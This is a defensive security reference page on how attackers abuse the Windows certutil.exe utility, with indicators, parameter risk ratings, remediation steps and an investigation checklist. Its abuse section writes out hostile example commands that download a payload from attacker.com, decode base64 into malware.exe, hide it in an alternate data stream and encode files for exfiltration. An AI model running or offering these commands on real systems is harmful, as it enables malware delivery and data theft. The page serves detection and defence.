Critical RiskWindowsLegitimateCommonly Abused
certutil.exeSYSTEM UTILITY

certutil.exe - Certificate Utility LOLBin Security Analysis

certutil.exe is a Windows **certificate management utility** and one of the most **notorious LOLBins** (Living-off-the-Land Binaries). Attackers abuse its **-urlcache** and **-decode** functions to **download malware**, **decode base64 payloads**, and **bypass security controls**. Every certutil.exe execution warrants scrutiny.

Risk Summary

CRITICAL priority for SOC triage. certutil.exe is a top-tier LOLBin frequently abused for downloading malware and decoding payloads. **Any use of -urlcache, -decode, or -encode parameters requires immediate investigation**. Block or heavily monitor this binary.

Overview

What is certutil.exe?

certutil.exe is a command-line utility for managing Windows certificates and certificate stores.

Legitimate Functions

Certificate Management:

  • Install/remove certificates
  • Verify certificate chains
  • Manage certificate stores
  • Export/import certificates

Why It's Dangerous

LOLBin Capabilities:

  • Download files from URLs
  • Encode/decode Base64
  • Calculate file hashes
  • All as a signed Microsoft binary

Security Significance

  • Trusted Binary: Signed by Microsoft
  • Multi-Purpose: Download, decode, encode
  • Defense Evasion: Bypasses application controls
  • Prevalent Abuse: Featured in many attack chains

Normal Behavior

Normal Behavior

Expected Process State

PropertyExpected Value
PathC:\Windows\System32\certutil.exe
Parentcmd.exe, powershell.exe (admin context)
UserAdministrator (usually)
ContextCertificate management tasks

Legitimate Usage Examples

:: Verify certificate chain
certutil -verify cert.cer

:: View certificate store
certutil -store my

:: Calculate file hash (legitimate use)
certutil -hashfile file.exe SHA256

Frequency

Legitimate use is infrequent in most environments.

Common Locations

C:\Windows\System32\certutil.exeC:\Windows\SysWOW64\certutil.exe

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE

Command:     certutil -verify cert.cer
             certutil -store my
             certutil -hashfile document.pdf SHA256
Context:     Certificate operations by admin
Frequency:   Rare

SUSPICIOUS (High Confidence)

Command:     certutil -urlcache -split -f http://...
             certutil -decode payload.txt malware.exe
             certutil -encode malware.exe payload.txt
Context:     Any non-admin user
Frequency:   Repeated or automated

Danger Assessment by Parameter

ParameterRiskDescription
-urlcache -fCRITICALDownloads file from URL
-decodeCRITICALDecodes Base64 to executable
-encodeHIGHEncodes binary for exfiltration
-hashfileLOWCalculate hash (can be legitimate)
-verifyLOWCertificate verification

Abuse Techniques

Attack Techniques

Technique #1: File Download (T1105)

Download Malware:

certutil -urlcache -split -f http://attacker.com/payload.exe C:\Temp\payload.exe

Variations:

certutil -urlcache -split -f https://... output.exe
certutil.exe -urlcache -f http://... %TEMP%\mal.exe

Technique #2: Decode Payloads (T1140)

Base64 Decode:

:: Attacker drops encoded payload
certutil -decode encoded.txt malware.exe

Attack Flow:

  1. Drop Base64-encoded payload via other means
  2. Use certutil to decode to executable
  3. Execute decoded payload

Technique #3: Alternate Data Streams

certutil -urlcache -split -f http://... C:\file.txt:hidden.exe

Technique #4: Encode for Exfiltration (T1041)

certutil -encode sensitive.docx encoded.txt
:: Exfiltrate encoded.txt

Remediation Steps

Protection and Remediation

Defense: Application Whitelisting

Block certutil.exe for non-admin users:

# AppLocker rule example
New-AppLockerPolicy -RuleType Publisher -User "Everyone" -Deny -Path "certutil.exe"

Defense: Command Line Logging

Ensure all certutil executions are logged with full command lines.

Defense: Network Monitoring

Alert on certutil.exe making network connections.

If Compromise Suspected

  1. Identify all certutil executions
  2. Extract command line parameters
  3. Locate any downloaded files
  4. Check for decoded executables
  5. Trace execution chain
  6. Hunt for persistence

Investigation Checklist

Investigation Checklist

  • Review full command line arguments
  • Check for -urlcache, -decode, -encode
  • Identify any downloaded files
  • Trace file execution after download
  • Review parent process
  • Check user context (admin vs standard)
  • Search for related decoded files
  • Hunt for Base64-encoded content

MITRE ATT&CK Techniques

Last verified: January 18, 2026